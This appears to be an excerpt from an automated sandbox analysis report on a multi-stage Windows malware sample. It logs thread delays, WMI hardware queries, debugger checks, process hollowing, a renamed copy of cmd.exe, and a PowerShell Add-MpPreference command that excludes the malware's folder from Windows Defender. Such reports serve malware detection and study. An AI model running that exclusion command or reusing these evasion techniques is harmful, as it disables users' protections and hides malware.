Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98692s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98253s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97956s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97831s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97706s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97592s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97346s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97229s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97112s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96987s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96737s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96612s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96487s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96362s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96246s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99838s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99536s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99226s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97124s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -97012s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -96890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8108	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02D95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02D95908

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99841	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99682	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99392	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99248	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99105	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98983	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98743	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98632	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98407	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98288	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98147	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97920	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97811	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97661	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97403	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97104	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96987	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96862	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96734	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96622	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96511	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96299	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96174	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96049	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95924	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95799	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99732	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99612	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98867	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98607	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98340	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98233	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98072	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97945	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97834	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97708	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97580	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97451	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97291	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97087	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96940	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99861
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99718
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99592
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99351
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99106
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98670
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98540
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98356
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98203
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98081
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97957
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97829
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97519
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97175
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96957
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96795
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96550
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99792
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99504
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99391
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99279
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99167
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99055
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98828
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98692
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98578
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98253
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98106
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97956
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97831
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97706
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97592
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97485
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97346
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97229
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97112
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96987
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96862
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96737
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96612
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96487
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96362
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96246
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99953
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99838
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99671
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99536
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99226
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99105
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98874
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98656
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98546
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98437
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98327
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98218
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98109
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97999
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97781
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97671
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97562
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97453
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97343
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97234
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97124
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97012
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96890
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: x.exe, 00000004.00000002.2126176510.00000000008EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&
Source: neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2261214334.000000000071E000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 0000001D.00000002.2332989734.0000000000677000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node			graph_4-32760
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02DAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02DAF744

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02DA894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02DA894C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 11_1_004015D7 SetUnhandledExceptionFilter,	11_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 11_1_004015D7 SetUnhandledExceptionFilter,	11_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 26_1_004015D7 SetUnhandledExceptionFilter,	26_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 26_1_004015D7 SetUnhandledExceptionFilter,	26_1_004015D7

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000

Writes to foreign memory regions

